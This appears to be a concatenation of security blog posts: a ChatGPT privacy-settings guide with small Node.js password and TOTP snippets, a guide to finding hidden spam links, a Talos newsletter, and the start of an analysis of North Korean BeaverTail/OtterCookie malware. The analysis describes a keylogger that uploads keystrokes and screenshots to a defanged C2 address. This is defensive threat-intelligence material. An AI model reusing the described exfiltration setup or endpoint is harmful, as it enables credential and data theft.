These defenses layer on Microsoft’s platform controls, reducing attacker dwell time and shortening the detection-to-remediation window.
How Talos protects against Direct Send abuse
Talos leverages advanced AI and machine learning to continuously analyze global email telemetry, campaign infrastructure, and evolving social engineering tactics — ensuring our customers stay ahead of emerging threats. Our security platform goes far beyond basic header checks, using behavioral analytics, deep content inspection, and continually adapting models to identify and neutralize sophisticated malicious actors before they target your organization.
Contact Cisco Talos Incident Response to learn more about everything from proactively securing critical communications and endpoint protection, to security auditing and incident management.
Acknowledgments: We appreciate the sustained efforts of Microsoft’s engineering and security teams and the broader research community whose transparent publications inform defenders worldwide.
Reducing abuse of Microsoft 365 Exchange Online’s Direct Send
When we interact with artificial intelligence, we often share a significant amount of personal information without giving it much thought. This information can range from dietary preferences and marital status to our home address and even social security number. To ensure the security and privacy of this highly sensitive information, it’s essential to understand exactly what the AI does with your data: where it stores it and whether it uses it for training.
In this post, we take a closer look at the data collection policy of one of the most popular AI apps, ChatGPT, and explain how to configure it to maximize your privacy and security to the extent that OpenAI allows it. This is a long guide — but a comprehensive one.
OpenAI, the owner and developer of ChatGPT, maintains two privacy policies. The specific policy that applies to a user depends on the region where that individual registered their account.
Because these policies are similar, we’ll first cover the common elements, and then discuss the differences.
By default, OpenAI collects an extensive array of personal information and technical data about devices from all ChatGPT users:
Account information: name, login credentials, date of birth, billing information, and transaction history
User content: prompts as well as uploaded files, images, and audio
Communication information: contact details the user provided when reaching out to OpenAI via email or social media
Log data: IP address, browser type and settings, request date and time, and details about how the user interacts with OpenAI services
Usage data: information about the user’s interaction with OpenAI services, such as content viewed, features used, actions taken, and technical details like country, time zone, device, and connection type
Device information: device name, operating system, device identifiers, and the browser used
Location information: the region determined by the IP address, rather than the exact location
Cookies and similar technologies: necessary for service operation, user authentication, enabling specific features, and ensuring security; the complete list of cookies and their respective retention periods is available here
What exactly OpenAI does with the data it collects from individual users will be discussed in the next part of this post. Here, we indicate the key difference between the privacy policies for users from the European Economic Area (EEA) and those from other regions. European users have the right to object to the use of their personal data for direct marketing. They may also challenge data processing where the company justifies this by its “legitimate interests”, such as internal administration or improvements to services.
Note that OpenAI’s handling of data for business accounts is governed by separate rules that apply to ChatGPT Business and ChatGPT Enterprise subscriptions, as well as API access.
What OpenAI does with your data, and whether ChatGPT is trained on your chats
By default, ChatGPT can train its models on user prompts and the content that users upload. This policy applies to users of both the free version and the Plus and Pro subscriptions.
For business accounts — specifically ChatGPT Enterprise, ChatGPT Business, and API access — training on user data is disabled by default. However, in the case of the API (the application programming interface that connects OpenAI models to other applications and services — the simplest use case being ChatGPT-based customer support bots), the company provides developers with the option to voluntarily enable data transmission.
OpenAI outlines a comprehensive list of primary purposes for processing users’ personal information:
To maintain services: to respond to queries and assist users
To improve and develop services: to add new features and conduct research
To communicate with users: to notify users about changes and events
To protect the security of services: to prevent fraud and ensure security
To comply with legal obligations: to protect the rights of users, OpenAI, and third parties
The company also states that it may anonymize users’ personal data, though it does not obligate itself to do so. Furthermore, OpenAI reserves the right to transfer user data to third parties — specifically its contractors, partners, or government agencies — if such transfer is necessary for service operation, compliance with the law, or the protection of rights and security.
As the company notes on its website: “In some cases, models may learn from personal information to understand how elements like names and addresses function in language, or to recognize public figures and well-known entities”.
It’s important to note that all user data is processed and stored on OpenAI servers in the United States. Although the level of personal information protection may vary from country to country, the company asserts that it applies uniform security measures to all users.
How to prevent ChatGPT from using your data for AI training
To disable the collection of your data within the app, click your account name in the lower left corner of the screen. Select Settings, then navigate to Data controls.
In the Data controls section of the ChatGPT settings, you can disable the use of your prompts for model training
In Data controls, turn off the toggles next to the following items:
Improve the model for everyone: disabling this option prevents the use of your prompts and uploads (text, files, images) for model training. Turning this off deactivates the two items below it
Include your audio recordings: disabling this option prevents the voice messages from the dictation feature from being used for model training. It’s disabled by default
Include your video recordings: this refers to the feature that allows you to include a video stream from your camera during a voice chat in the ChatGPT apps for iOS and Android. This video stream may also be used for model training. You can also disable this option through the web application. It’s disabled by default
By turning off these settings, you prevent the use of new data for model training. However, it’s important to realize: if your prompts or content were already used for training before you disabled the option, it’s impossible to remove them from the trained model.
In this same section, you can delete or archive all chats, and also request to Export Data from your account. This allows you to check what information OpenAI stores about you. A data archive will be sent to your email. Please note that preparing an export may take some time.
The Delete account option is also available here. When your account is deleted, only your personal data is erased; information already used for model training remains.
Beyond the in-app settings, you can manage your data through the OpenAI Privacy Portal. On the portal, you can:
Request and download all your data stored by OpenAI
Completely delete your custom GPTs, as well as your ChatGPT account and the personal data associated with it
Ask OpenAI not to train the AI on your data. If OpenAI approves your request, the AI will stop training on the data you provided before you disabled the Improve the model for everyone option in the settings
Sometimes ChatGPT may also train on personal data from public sources — you can submit a request to stop this as well
Request the deletion of personal data from specific conversations or prompts
Users from the European Economic Area, the UK, and Switzerland have additional rights under the GDPR. The law is in effect in European countries and regulates how companies collect and use personal data. These rights are not directly displayed on the OpenAI Privacy Portal, but they can be exercised by submitting a request through the portal, or by writing to dsar@openai.com.
How to clear your data from ChatGPT’s memory
Another critical element of privacy protection is ChatGPT’s memory. Unlike chat history, memory allows the model to recall specific details about you, such as your name, interests, preferences, and communication style. This data persists across sessions and is used to personalize the AI’s responses.
To review exactly what the AI remembers within the app, click your account name in the lower-left corner of the screen. Choose Settings, then navigate to Personalization, and select Manage memories.
Under Personalization, you can manage saved memories, temporarily disable memory, or prevent the model from referring to chat history when responding
This section displays all stored information. If you wish for ChatGPT to forget a specific detail, click the trash can icon next to that memory. Important: for a memory to be completely erased, you need to also delete the specific chat the information was saved from. If you delete only the chat but not the memory, the data remains stored.
In Personalization, you can also configure what data ChatGPT will store about you in future conversations. To do this, you should familiarize yourself with the two types of memory available in the AI:
Saved memories are fixed recollections about you, such as your name, interests, or communication style, which remain in the system until you manually delete them. These are created when you explicitly ask the chat to remember something
Chat history is the model’s ability to consider specific details from past conversations to produce more personalized responses. In this case, ChatGPT doesn’t store every detail; instead, it selects only fragments that it deems useful. These types of memories can change and adapt over time
You can disable one or both of these memory types in the ChatGPT settings. To deactivate saved memories, turn off the toggle next to Reference saved memories. To do the same for chat history, turn off the toggle next to Reference chat history.
Disabling these features doesn’t delete previously saved information. The data remains within the system, but the model ceases to reference it in new responses. To completely delete saved memories, go to the Manage memories section as described above.
The Personalization menu in the web-based version of ChatGPT is slightly different, with an additional option: Record mode. This allows the AI to reference transcripts of your past recordings when generating responses. It is possible to disable this feature within the web interface.
In addition, the web version displays a memory usage indicator, such as 87% full, which shows how much space is occupied by memories.
The web version of ChatGPT also includes a memory usage indicator under Personalization
For sensitive conversations, you can utilize special Temporary Chats, which the AI won’t remember.
How to use Temporary Chats in ChatGPT
Temporary Chats in ChatGPT are designed to resemble incognito mode in a web browser. If you want to discuss something particularly intimate or confidential with the AI, this mode helps reduce the risks. The chats are not saved in the history, they don’t become part of the memory, and they’re not used to train the models. This last point holds true for all Temporary Chats regardless of the settings selected in the Data controls section, which was discussed above.
Once a session ends, its contents disappear and cannot be recovered. This means Temporary Chats won’t appear in your history, and ChatGPT won’t remember their content. However, OpenAI warns that for security purposes, a copy of the Temporary Chat may be stored on the company’s servers for up to 30 days.
In June 2025, a court ordered OpenAI to preserve all user chats with ChatGPT indefinitely. The decision has already taken effect, and even though the company plans to appeal it, at the time of this publication, OpenAI is compelled to store Temporary Chat data permanently in a special secure repository that “can only be accessed under strict legal protocols”. This largely nullifies the entire concept of “Temporary Chats”, and confirms the old adage, “There’s nothing more permanent than the temporary”.
It’s important to note that when creating a Temporary Chat, you’re starting a conversation with the AI from a blank slate: the chatbot won’t remember any information from its previous chats with you.
To initiate a Temporary Chat in the web-based version of ChatGPT, open a new chat and click the Turn on temporary chat button in the upper right corner of the page.
In the web version of ChatGPT, the Turn on temporary chat button is located in the upper right corner of the screen, and launches a new chat that won’t save any history or memory
To activate a Temporary Chat in the ChatGPT applications for macOS and Windows, click the AI model selection, and a Temporary Chat toggle will appear at the bottom of the window that opens.
In the ChatGPT app for macOS, Temporary Chat activation is available in the model selection menu
After a Temporary Chat is activated, a special screen will open, which will look slightly different in the desktop and web versions. If you see this screen, it means things are working correctly.
Temporary Chats are not saved in history, used to update memory, or utilized for model training
Integrating ChatGPT with your device applications
The ChatGPT application includes a feature named Work with Apps. This allows you to interact with the AI beyond the ChatGPT interface itself, extending its functionality into other apps on your device. Specifically, the model can connect to text editors and various development environments.
When you utilize this feature, you can receive AI suggestions and make edits directly within those apps, eliminating the need to copy text to a separate chat window. The core concept is to embed the AI into your existing, familiar workflows.
However, along with the convenience, this feature introduces privacy risks. By connecting to applications, ChatGPT gains access to the content of the files you’re working on. These files may include personal documents, work projects or reports, notes containing confidential information, and other similar content. A portion of this data may be sent to OpenAI’s servers for analysis and response generation.
Therefore, the more applications you grant access to, the higher the probability that sensitive information will be exposed to OpenAI.
No comparable list has been published for the Windows version of the app yet.
To check if this feature is currently enabled on your device, click your account name in the lower-left corner of the screen. Select Settings and scroll down to Work with Apps. If the toggle switch next to Enable Work with Apps is on, the feature is turned on.
In Work with Apps, you can check if the feature is enabled, and manage connections to installed apps
It’s important to emphasize that enabling the feature doesn’t immediately give the ChatGPT app access to the applications on your device. For ChatGPT to analyze and make changes to content in other apps, the user must explicitly grant a separate permission to each individual app.
If you’re unsure whether you’ve granted ChatGPT any access permissions, you can verify this within the same section. To do this, select Manage Apps. The window that opens will display every app on your device that ChatGPT can potentially interact with. If each app shows Requires permissions underneath it, and Enable Permission on the right, it signifies that ChatGPT currently has no access to any apps.
Manage Apps displays the apps ChatGPT can potentially access
On macOS, should you choose to grant ChatGPT access to an application, you must also enable the AI app to control your computer via the accessibility features in the system settings. This permission grants ChatGPT extensive extra capabilities: monitoring your activities, managing other applications, simulating keystrokes, and interacting with the user interface. For this very reason, these permissions are granted only manually and require the user’s explicit confirmation.
If you’re concerned about the uncontrolled sharing of your data with ChatGPT, we recommend you disable the Enable Work with Apps toggle switch and forgo using this feature.
However, if you want ChatGPT to be able to work with applications on your device, you should pay attention to the following three features, and configure them according to your personal balance of privacy and convenience:
Automatically pair with apps from chat bar allows ChatGPT to automatically connect to supported applications directly from the chat UI without requiring manual selection each time. This speeds up your workflow, but increases the risk that the model will gain access to an application that the user didn’t intend to connect it to
Generate suggested edits allows ChatGPT to propose changes to text or code within the connected application, but you’ll need to apply those changes manually. This is the safer option because the user retains control over changes being made
Automatically apply suggested edits allows the model to immediately implement changes to files. While this maximizes process automation, it carries additional risks, as modifications could be applied without confirmation — potentially affecting important documents or work projects
How to connect ChatGPT to third-party online services
ChatGPT can also be connected to third-party online services for greater customization: this allows the AI to offer more precise answers and execute tasks better by considering, for example, your email correspondence in Gmail or schedule in Google Calendar.
Unlike Work with Apps, which enables ChatGPT to interact with locally installed applications, this feature involves external online platforms like GitHub, Gmail, Google Calendar, Teams, and many others.
The exact list of available services depends on your plan. The most extensive selection is available in the Business, Enterprise, and Edu tiers; a slightly more limited set is found in Pro; and the roster of services is significantly more modest in Plus. Free users have no access to this feature. Some regional restrictions also apply. You can view the full list for all plans by following the link.
When connecting to third-party services, it’s crucial to understand exactly what data OpenAI will process, how, and for what purposes. If you haven’t disabled training on your data, information received from connected services may also be used for model training. Furthermore, with the memory option enabled, ChatGPT is capable of remembering details obtained from third-party services and utilizing them in future chats.
To view the list of online services available for connection, click your account name in the bottom left corner of the screen. Then, select Settings and, in the Account section, navigate to Connectors.
Connectors available in the ChatGPT settings
Under Connectors, you’ll see services that are already connected, as well as those that are available for activation. To disconnect ChatGPT from a service, select the service and click Disconnect.
The settings for each connector allow you to disable ChatGPT’s access to the service, view the date when it was connected, and allow or disallow the automatic use of its data in chats
To mitigate privacy risks, we recommend connecting only the absolutely necessary services, and configuring the memory and data controls within ChatGPT in advance.
How to set up secure login to ChatGPT
If you are a frequent ChatGPT user, the service likely stores significantly more information about you than even social media. Therefore, if your account is compromised, attackers could gain access to data they can use for doxing, blackmail, fraud, theft of funds, and other types of attacks.
To mitigate these risks, it’s essential to set a complex password, and enable two-factor authentication for logging in to ChatGPT. What we have in mind when we say “complex” is a password that meets all of the following criteria:
A minimum length of 16 characters
A combination of uppercase and lowercase letters, numbers, and special characters
Ideally, no dictionary words, no simple sequences like “12345” or “qwerty”, and no repeating characters
Uniqueness: a different password for each website or online service
If your current ChatGPT password doesn’t satisfy these criteria, we strongly recommend you change it. While there’s no option to change the password as such in the ChatGPT settings, you can use the password reset procedure. To do this, log out of your account, select Forgot password? on the login screen, and follow the instructions to set up a new password.
You may be tempted to use the AI model itself to generate a password. However, we don’t recommend this: our research suggests that chatbots are often not very effective at this task, and frequently generate highly insecure passwords. Furthermore, even if you explicitly ask the neural network to create a random password, it won’t be truly random, and will therefore be more vulnerable.
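If you want to see how a properly random password can be produced without an AI model, here is a minimal Node.js sketch using the built-in crypto module. The character set and length are our own illustrative choices that satisfy the criteria above, not an official recommendation:

```javascript
const crypto = require("crypto");

function generatePassword(length = 16) {
  const charset =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+";
  let password = "";
  while (password.length < length) {
    const byte = crypto.randomBytes(1)[0]; // cryptographically secure randomness
    // Rejection sampling: discard bytes that would introduce modulo bias
    if (byte < charset.length * Math.floor(256 / charset.length)) {
      password += charset[byte % charset.length];
    }
  }
  return password;
}

console.log(generatePassword(20));
```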
For additional account protection, we also recommend enabling two-factor authentication: navigate to Settings, select Security, and turn on the Multi-factor authentication toggle switch. After this, scan the QR code in an authenticator application, or manually enter the secret key that appears on the screen, and verify the action with the one-time code.
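For the curious: the one-time codes your authenticator app produces from the scanned secret are standard TOTP values (RFC 6238), not anything ChatGPT-specific. The sketch below, using a hypothetical base32 secret key, shows roughly how an authenticator derives them:

```javascript
const crypto = require("crypto");

// Decode the base32 secret key shown during MFA setup (the key below is hypothetical).
function base32Decode(s) {
  const alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
  let bits = "";
  for (const c of s.replace(/=+$/, "").toUpperCase()) {
    bits += alphabet.indexOf(c).toString(2).padStart(5, "0");
  }
  const bytes = [];
  for (let i = 0; i + 8 <= bits.length; i += 8) {
    bytes.push(parseInt(bits.slice(i, i + 8), 2));
  }
  return Buffer.from(bytes);
}

// RFC 6238 TOTP: HMAC-SHA1 over a 30-second time counter, dynamically truncated.
function totp(secretBase32, step = 30, digits = 6) {
  const counter = Buffer.alloc(8);
  counter.writeBigUInt64BE(BigInt(Math.floor(Date.now() / 1000 / step)));
  const hmac = crypto.createHmac("sha1", base32Decode(secretBase32)).update(counter).digest();
  const offset = hmac[hmac.length - 1] & 0x0f;
  const code = (hmac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
  return String(code).padStart(digits, "0");
}

console.log(totp("JBSWY3DPEHPK3PXP")); // hypothetical secret key
```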
In the Security section of the web version, you can also log out of all active sessions on all devices, including your current one. Unfortunately, you cannot view the login history. We recommend using this feature if you suspect that someone may have gained unauthorized access to your account.
In the web version’s security settings, you can enable multi-factor authentication, and also log out of ChatGPT on all devices
Final tips to secure your data
When using AI chatbots, it’s important to remember that these applications create new privacy challenges. To protect our data, we now must account for things that were not a concern when setting up accounts in traditional apps and web services, or even in social media and messaging apps. We hope that this comprehensive guide to privacy and security settings in ChatGPT will help you with this tricky task.
Also, please remember to safeguard your ChatGPT account against hijacking. The best way to do this is by using an app that generates and securely stores strong passwords, while also managing two-factor authentication codes.
Kaspersky Password Manager helps you create unique, complex passwords, autofill them when logging in, and generate one-time codes for two-factor authentication. Passwords, one-time codes, and other data encrypted in Kaspersky Password Manager can be synchronized across all your devices. This will help provide robust protection for your account in ChatGPT and other online services.
If you’re looking for more information on the secure use of artificial intelligence, check out our other posts on the topic.
If your corporate website’s search engine rankings suddenly drop for no obvious reason, or if clients start complaining that their security software is blocking access or flagging your site as a source of unwanted content, you might be hosting a hidden block of links. These links typically point to shady websites, such as pornography or online casinos. While these links are invisible to regular users, search engines and security solutions scan and factor them in when judging your website’s authority and safety. Today, we explain how these hidden links harm your business, how attackers manage to inject them into legitimate websites, and how to protect your website from this unpleasantness.
Why hidden links are a threat to your business
First and foremost, hidden links to dubious sites can severely damage your site’s reputation and lower its ranking, which will immediately impact your position in search results. This is because search engines regularly scan websites’ HTML code, and are quick to discover any lines of code that attackers may have added. Using hidden blocks is often viewed by search algorithms as a manipulative practice: a hallmark of black hat SEO (also known simply as black SEO). As a result, search engines lower the ranking of any site found hosting such links.
Another reason for a drop in search rankings is that hidden links typically point to websites with a low domain rating, and content irrelevant to your business. Domain rating is a measure of a domain’s authority — reflecting its prestige and the quality of information published on it. If your site links to authoritative industry-specific pages, it tends to rise in search results. If it links to irrelevant, shady websites, it sinks. Furthermore, search engines view hidden blocks as a sign of artificial link building, which, again, penalizes the victim site’s placement in search results.
The most significant technical issue is the manipulation of link equity. Your website has a certain reputation or authority, which influences the ranking of pages you link to. For example, when you post a helpful article on your site, and link to your product page or contacts section, you’re essentially transferring authority from that valuable content to those internal pages. The presence of unauthorized external links siphons off this link equity to external sites. Normally, every internal link helps search engines understand which pages on your site are most important — boosting their position. However, when a significant portion of this equity leaks to dubious external domains, your key pages receive less authority. This ultimately causes them to rank lower than they should — directly impacting your organic traffic and SEO performance.
In the worst cases, the presence of these links can even lead to conflicts with law enforcement, and entail legal liability for distributing illegal content. Depending on local laws, linking to websites with illegal content could result in fines or even the complete blocking of your site by regulatory bodies.
How to check your site for hidden links
The simplest way to check your website for blocks of hidden links is to view its source code. To do this, open the site in a browser and press Ctrl+U (in Windows and Linux) or Cmd+Option+U (in macOS). A new tab will open with the page’s source code.
In the source code, look for the following CSS properties that can indicate hidden elements:
display:none
visibility:hidden
opacity:0
height:0
width:0
position:absolute
These elements relate to CSS properties that make blocks on the page invisible — either entirely hidden or reduced to zero size. Theoretically, these properties can be used for legitimate purposes — such as responsive design, hidden menus, or pop-up windows. However, if they’re applied to links or entire blocks of link code, it could be a strong sign of malicious tampering.
Additionally, you can search the code for keywords related to the content that hidden links most often point to, such as “porn”, “sex”, “casino”, “card”, and the like.
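To automate this check, you could run a small script over a saved copy of the page source. This Node.js sketch simply flags lines that contain a link together with one of the CSS indicators or keywords above; the file name page.html and the exact patterns are illustrative assumptions, and a real audit would also need to inspect external stylesheets:

```javascript
const fs = require("fs");

// CSS properties that can hide elements, mirroring the indicators listed above
const indicators = [
  /display\s*:\s*none/i,
  /visibility\s*:\s*hidden/i,
  /opacity\s*:\s*0(?![.\d])/i,
  /height\s*:\s*0/i,
  /width\s*:\s*0/i,
  /position\s*:\s*absolute/i,
];
const keywords = /porn|sex|casino|card/i;

const html = fs.readFileSync("page.html", "utf8");
html.split("\n").forEach((line, i) => {
  const hasLink = /<a\s[^>]*href/i.test(line);
  if (hasLink && (indicators.some((re) => re.test(line)) || keywords.test(line))) {
    console.log(`line ${i + 1}: possible hidden link -> ${line.trim().slice(0, 120)}`);
  }
});
```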
For a deep dive into the specific methods attackers use to hide their link blocks on legitimate sites, check out our separate, more technical Securelist post.
How do attackers inject their links into legitimate sites?
To add an invisible block of links to a website, attackers first need the ability to edit your pages. They can achieve this in several ways.
Compromising administrator credentials
The dark web is home to a whole criminal ecosystem dedicated to buying and selling compromised credentials. Initial-access brokers will provide anyone with credentials tied to virtually any company. Attackers obtain these credentials through phishing attacks or stealer Trojans, or simply by scouring publicly available data breaches from other websites in the hope that employees reuse the same login and password across multiple platforms. Additionally, administrators might use overly simple passwords, or fail to change the default CMS credentials. In these cases, attackers can easily brute-force the login details.
Gaining access to an account with administrator privileges gives criminals broad control over the website. Specifically, they can edit the HTML code, or install their own malicious plugins.
Exploiting CMS vulnerabilities
We frequently discuss various vulnerabilities in CMS platforms and plugins on our blog. Attackers can leverage these security flaws to edit template files (such as header.php, footer.php, or index.php), or directly insert blocks of hidden links into arbitrary pages across the site.
Compromising the hosting provider
In some cases, it’s the hosting company that gets compromised rather than the website itself. If the server hosting your website code is poorly protected, attackers can breach it and gain control over the site. Another common scenario concerns a server that hosts sites for many different clients. If access privileges are configured incorrectly, compromising one client can give criminals the ability to reach other websites hosted on that same server.
Malicious code blocks in free templates
Not all webmasters write their own code. Budget-conscious and unwary web designers might try to find free templates online and simply customize them to fit the corporate style. The code in these templates can also contain covert blocks inserted by malicious actors.
How do you protect your site from hidden links?
To secure your website against the injection of hidden links and its associated consequences, we recommend taking the following steps:
Avoid using questionable third-party templates, themes, or any other unverified solutions to build your website.
Promptly update both your CMS engine and all associated themes and plugins to their latest versions.
Routinely audit your plugins and themes, and immediately delete the ones you don’t use.
Regularly create backups of both your website and database. This ensures you can quickly restore your website’s operation in the event of compromise.
Check for unnecessary user accounts and excessive access privileges.
Promptly delete outdated or unused accounts, and establish only the minimum necessary privileges for active ones.
Establish a strong password policy and mandatory two-factor authentication for all accounts with admin privileges.
Welcome to this week’s edition of the Threat Source newsletter.
I count myself fortunate that I have never been on the receiving end of a ransomware attack. My experiences have been from research and response, never as a victim. It’s a tough scenario: One day you are working or minding your own business when suddenly, threatening notes appear on desktops and systems simply stop working. So much of our survival as humans is tied to our livelihoods, so the amount of stress incurred can be severe. I get it, truly.
Consequently, I am endlessly, academically fascinated by stress responses and how humans… well… human during moments of adversity. A ransomware attack most certainly qualifies as adverse, and my sympathies are with you if you’ve ever had to endure one. But there’s a science to both the personal response and the business response, and to their impacts writ large.
Over the past year, excellent research has been published on these facets of response to help answer some of these questions, and naturally I dove right in. One of the things that stuck out to me was the impact of these attacks on small businesses as a victim segment. A notable quote from a small business in the U.K. government’s “The experiences and impacts of ransomware attacks on individuals and organisations” states:
“I’ve started to rebuild, using personal funds and living off personal funds for the last 2 or 3 years… I’ve got 0 savings left… It’s had a total impact on me… I’ve gone from probably nearly a £250,000 business down to about a £20,000 business.”
This quote isn’t unique in its impacts. Anecdotally, I can tell you small businesses make up a large swath of ransomware victims. It makes sense: small victims likely pay out less, but they also tend to have lower security standards and less security knowledge to defend themselves with. They also lack the cash reserves, legal teams, and dedicated IT security staff that a mid-sized or larger business has. Simply put, they are disproportionately vulnerable.
So, what about the impacts to health and wellbeing? What, if anything, do we do? And why the hell should any business even care? To paraphrase the Royal United Services Institute (RUSI) report ‘Your Data is Stolen and Encrypted’: The Ransomware Victim Experience, ransomware victims experience trauma, exhaustion, and emotional harm that rival, and often outlast, the financial or operational damage. You can survive the immediate operational harm of a cyber attack and recover your day-to-day business operations, only to lose the war as your employees cope with and process the trauma of the event, undermining your business’s ability to compete and survive.
A cyber attack is both a technical and a psychological crisis. Business leadership would be wise to understand this. Lead with empathy, and remember that your employees look to you for leadership, especially in these incidents. People follow calm, not commands. Have an incident response plan for how you respond to the technical crisis, but also for how you take care of your people. You might find yourself that much stronger at the end, with both a company that can handle adversity and employees who feel cared for.
The one big thing
Cisco Talos discovered a new malware campaign linked to the North Korean threat group Famous Chollima, which targets job seekers with trojanized applications to steal credentials and cryptocurrency. The campaign features two primary tools, BeaverTail and OtterCookie, whose functionalities are merging and now include new modules for keylogging, screenshot capture, and clipboard monitoring. The attackers deliver these threats through malicious NPM packages and even a fake VS Code extension, making detection and prevention more challenging.
Why do I care?
This campaign highlights how attackers use social engineering and software supply chain attacks to compromise individuals and organizations, not just targeting companies directly. If you or your organization use development tools, npm packages, or receive unsolicited job offers, you could be at risk of credential or cryptocurrency theft.
So now what?
Be vigilant when installing NPM packages, browser extensions, or software from unofficial sources, and verify the legitimacy of job offer communications. Use layered security solutions, such as endpoint protection, multi-factor authentication, and network monitoring tools like those recommended by Cisco, to detect and block these threats.
Top security headlines of the week
Harvard is first confirmed victim of Oracle EBS zero-day hack Harvard was listed on the data leak website dedicated to victims of the Cl0p ransomware on October 12. The hackers have made available over 1.3 TB of archive files that allegedly contain Harvard data. (SecurityWeek)
Two new Windows zero-days exploited in the wild Microsoft released fixes for 183 security flaws spanning its products, including three vulnerabilities that have come under active exploitation in the wild. One affects every version ever shipped. (The Hacker News)
Officials crack down on Southeast Asia cybercrime networks, seize $15B The cryptocurrency seizure and sanctions targeting the Prince Group, associates and affiliated businesses mark the most extensive action taken against cybercrime operations in the region to date. (CyberScoop)
Extortion group leaks millions of records from Salesforce hacks The leak occurred days after the group, an offshoot of the notorious Lapsus$, Scattered Spider, and ShinyHunters hackers, claimed the theft of data from 39 Salesforce customers, threatening to leak it unless the CRM provider pays a ransom. (SecurityWeek)
Can’t get enough Talos?
Humans of Talos: Laura Faria and empathy on the front lines What does it take to lead through chaos and keep organizations safe in the digital age? Amy sits down with Laura Faria, Incident Commander at Cisco Talos Incident Response, to explore a career built on empathy, collaboration, and a passion for cybersecurity.
Beers with Talos: Two Marshalls, one podcast Talos’ Vice President Christopher Marshall (the “real Marshall,” much to Joe’s displeasure) joins Hazel, Bill, and Joe for a very real conversation about leading people when the world won’t stop moving.
What does it take to lead through chaos and keep organizations safe in the digital age? This week, Amy sat down with Laura Faria, an incident commander at Cisco Talos Incident Response, to explore a career built on empathy, collaboration, and a passion for cybersecurity.
Laura opens up about her journey through various cybersecurity roles, her leap into incident response, and what it feels like to support customers during their toughest moments — including high-stakes situations impacting critical infrastructure.
Amy Ciminnisi: Laura, it’s great to have you on. You’re an incident commander, like Alex from last episode. When did your time at Talos start, and what did your journey here look like?
Laura Faria: My entire career, I’ve worked in many large cybersecurity vendors – endpoint vendors, firewall vendors, RAV vendors… So I’ve been in a lot of different roles, but they were mostly in sales. I was actually a Cisco employee prior to joining Talos IR. I’ve been at Cisco for a little over a year now, and Talos is one of the best places to work in Cisco, in my opinion. They have a really high reputation because everyone knows the quality of research that Talos provides our customers with.
I’d never been an incident commander before, so it was a really new position to me. But it was definitely something I was interested in, and the more I learned about what the role entailed, the more I was excited to pursue it.
AC: This is a very high-pressure role, and I’m sure you have to deal with a lot of chaos, a lot of moving parts. How do you stay focused and motivated to keep going when you’re tackling these really serious incidents for our clients?
LF: A common phrase in Talos IR is “It’s never a good day when an incident happens.” During very serious episodes, being there to help the customer feels really good, especially if you’re a people person, and especially if you’re empathetic and engage a lot with people’s emotions.
Recently, I had a very difficult incident where a large health care facility was seeing a lot of outages in different locations throughout the nation. Every time we saw a site outage, it was devastating because we knew what that meant. We actually had people’s lives in our hands. Although it’s a very difficult job, taking the time to look at the big picture and understand the importance of your job is really what keeps you going.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!
Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). This group is known for impersonating hiring organizations to target job seekers, tricking them into installing information-stealing malware to obtain cryptocurrency and user credentials.
In this incident, although the organization was not directly targeted, one of its systems was compromised, likely because a user was deceived by a fake job offer and installed a trojanized Node.js application called “Chessfi.”
The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository.
Famous Chollima often uses two malicious tools, BeaverTail and OtterCookie, which started as separate but complementary programs. Recent campaigns have seen their functions merging, and Talos has identified a new module for keylogging and taking screenshots.
While searching for related threats, Talos also found a malicious VS Code extension containing BeaverTail and OtterCookie code. Although attribution to Famous Chollima is not certain, this suggests the group may be testing new methods for delivering their malware.
Introduction
In a previous Cisco Talos blog post, we described one side of the Contagious Interview (Deceptive Development) campaigns, where the threat actor utilized fake employment websites, ClickFix social engineering techniques and payload variants of credential and cryptocurrency remote access trojans (RATs) known as GolangGhost and PylangGhost.
Talos is actively monitoring other clusters of these campaigns, which are attributed to the threat actor group Famous Chollima, a subgroup of Lazarus, and aligned with the economic interests of DPRK. This post discusses some of the tactics, techniques and procedures (TTPs) and changes in tooling developed over time by another large cluster of Contagious Interview activities. These campaigns center around tools known as BeaverTail and OtterCookie.
Famous Chollima frequently uses BeaverTail and OtterCookie, with many individual sub-clusters of activities installing InvisibleFerret, a Python based modular payload. Although BeaverTail and OtterCookie originated as separate-but-complementary entities, their functionality in some recent campaigns started to merge, along with the inclusion of new functional OtterCookie modules.
Talos detected a Famous Chollima campaign in an organization headquartered in Sri Lanka. The organization was not deliberately targeted by the attackers, but one of the systems on its network was infected. It is likely that a user fell for a fake job offer instructing them to install a trojanized Node.js application called Chessfi as part of a fake job interview process.
Once Talos conducted the initial analysis, we realized that the tools used in the attack had characteristics of both BeaverTail and OtterCookie, blurring the distinction between the two. The code also contained some additional functionality we had not previously encountered.
BeaverTail and OtterCookie combine
This blog focuses on OtterCookie modules and will not provide a deep dive into well-known BeaverTail and OtterCookie functionality. While some of these modules are already known, at least one was not previously documented. The examples we show are already deobfuscated, and with the help of an LLM, the function and variable names are replaced by names that correspond to their actual functionality.
Keylogging and screenshotting module
Talos encountered a keylogging and screenshotting module in this campaign that has not been previously documented. We were able to find earlier OtterCookie samples containing the module that were uploaded to VirusTotal in April 2025.
The keylogging module uses the packages “node-global-key-listener” for keylogging, “screenshot-desktop” for taking desktop screenshots and “sharp” for converting the captured screenshots into web-friendly image formats.
The module configures the packages to listen for keystrokes and periodically take a screenshot of the current desktop session, then uploads both to the OtterCookie command and control (C2) server.
Figure 1. The keylogger listens for the keyboard and mouse key presses and saves them into a file.
The keystrokes are saved in the user’s temporary sub-folder windows-cache with the file name “1.tmp” and screenshots are saved in the same sub-folder with the file name “2.jpeg”. While the keylogger runs in a loop and flushes the buffer every second, a screenshot is taken every four seconds.
Talos also discovered one instance of the module where the clipboard monitoring was included in the module code, extending its functionality to stealing clipboard content.
The keylogging data and the captured screenshots are uploaded to the OtterCookie C2 server at a specific TCP port 1478, using the URL “hxxp[://]172[.]86[.]88[.]188:1478/upload”.
Figure 2. Keystrokes saved as “1.tmp” and screenshots as “2.jpeg”, then uploaded to C2 server.
OtterCookie VS Code extension
During the search for similar samples on VirusTotal, Talos discovered a recently-uploaded VS Code extension, which may attempt to run OtterCookie if installed in the victim’s editor environment. The extension is a fake employment onboarding helper, supposedly allowing the user to track and manage candidate tests.
